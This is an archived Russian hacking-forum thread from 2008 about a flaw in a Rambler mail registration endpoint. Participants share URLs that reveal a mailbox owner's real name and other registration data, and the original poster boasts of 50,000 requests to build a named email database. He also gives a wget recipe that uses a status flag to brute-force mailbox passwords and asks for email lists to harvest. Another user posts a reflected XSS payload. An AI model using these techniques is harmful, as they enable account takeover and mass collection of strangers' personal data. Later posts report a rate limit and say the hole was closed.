PDA

Просмотр полной версии : узнать ФамилиюИмя владельца мыла @rambler.ru


devton
13.06.2008, 10:43
http://id.rambler.ru/script/reg.cgi?password=666&username=luba@rambler.ru

достаточно просто открыть урл в бровзере - и увидите ЛюбаГиоргис - Firsname и Lastname - имя и фамилию, указанные владельцем мыла при регистрации ящика

самое интересное - похоже, нет ограничений на интенсивность обращения к урлу - получилось сделать около 50.000 запросов со скоростью около 20 запросов\сек. Т.е. легко собрать именную базу мыл на Рамблере :)

devton
13.06.2008, 10:52
П.С. с помощью этого урла можно еще и брутать пароль к ящику @rambler.ru
Если в теле запрошенной страницы (например, http://id.rambler.ru/script/reg.cgi?password=666666&username=luba@rambler.ru) есть код:
<status>1</status>
значит пароль "666666" подошел!

Учитывая отсутствие ограничений на кол-во\скорость подбора пароля получается неплохой "интерфейс" для брута :)

diman19911
14.06.2008, 20:37
а если <status>2</status>
то что тогда пароль не подходит?

mad_xakep
14.06.2008, 20:42
хм правду работает! первый раз про это слышу! спс

devton
14.06.2008, 20:42
мда блин :) используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс

SeTM
14.06.2008, 21:08
мда блин :) используя етот status можно брутить пароли к рамбл-ящику чз веб-интерфейс
причем очень легко...

X-Venom
14.06.2008, 21:18
Можна это все реализовать в брут пока бага еще свежая=)

devton
14.06.2008, 21:43
реализовать в брут :)
писать нич0 не надо - достаточно сгенерить или собрать файлик с паролями, перед каждым паролем вставить "http://id.rambler.ru/script/reg.cgi?username=luba@rambler.ru&password=", сохранить файлик как "brute.txt", запустить:

wget -i brute.txt

и брут начнецца :)

Sleep
14.06.2008, 21:51
Пасивная XSS
http://id.rambler.ru/script/reg.cgi?username=<script>alert('XSS')</script>

Vallez
16.06.2008, 00:10
devton подскажи способ что бы быстро вставить ссылку перед каждым паролем )

Sleep
16.06.2008, 23:31
П.С. с помощью этого урла можно еще и брутать пароль к ящику @rambler.ru
Если в теле запрошенной страницы (например, http://id.rambler.ru/script/reg.cgi?password=666666&username=luba@rambler.ru) есть код:
<status>1</status>
значит пароль "666666" подошел!

Учитывая отсутствие ограничений на кол-во\скорость подбора пароля получается неплохой "интерфейс" для брута :)
Ограничение на подбор пароля есть :(
после ~20 неправильных вводов пароля будет всегда выдавать <status>2</status>
а при попытке зайти с главной страницы будет просить ввода капчи :o

devton
17.06.2008, 10:32
Sleep, молодца :)
действительно, при подборе пароля к одному мыльнику ограничение имеецца :(
радует то, что при сборе имен-фамилий по куче мыл ограничений пака нет

Vallez, Htz Pro - это набор крохотных тулз, которые позволяют делать такие массовые подстановки/замены/вырезания

dscan
17.06.2008, 11:41
а что означают цифры после имени и фамилии? у одних 0027 или 0017 у других больше до 10 знаков

devton
17.06.2008, 16:53
Открой код страницы...там xml, все станет ясно (сам ща не могу тк чз оперуМини)

pixelm
17.06.2008, 17:33
интересная статейка, а на других почтовиках есть похожие фичи?

devton
17.06.2008, 18:04
dscan, циферки типа 0017 это на самом деле вод чт0:
LSPBirthDay>0</LSPBirthDay><LSPBirthMonth>0</LSPBirthMonth><LSPBirthYear></LSPBirthYear><LSPGender>1</LSPGender><LSPCountry>7</LSPCountry><LSPState></LSPState><LSPCity></LSPCity></PartnerData>
те день рождения, год, страна итп. У тех, кто указал все ето, циферок боольше чем в данном случае :)

pixelm, я ща ищу для других популярных русских служб...пока не наш0л

devton
26.06.2008, 09:58
Есть у кого относительно новая/полная/большая база мыльников рамблера? Я выкачал кучу файлов-миллионников с мылами, поискал среди них рамблеровские, отсортировал...в итоге чуть меньше 100.000 мыльников

Просто есть возможость собрать инфу по базе практически любого размера...подкинул бы кто базу валидных мылл рамблера

devton
29.06.2008, 10:51
Рамблер от детишек прикрылса...альтернативный интерфейс есть, но с сегодняшнего дня и там ФИО не выдаецца :(

gangs
01.07.2008, 17:45
ребят я новичёк в етом деле....обьясните че почем!!!)))плззззз!! :)

ziz1i
04.07.2008, 23:34
Уже не работает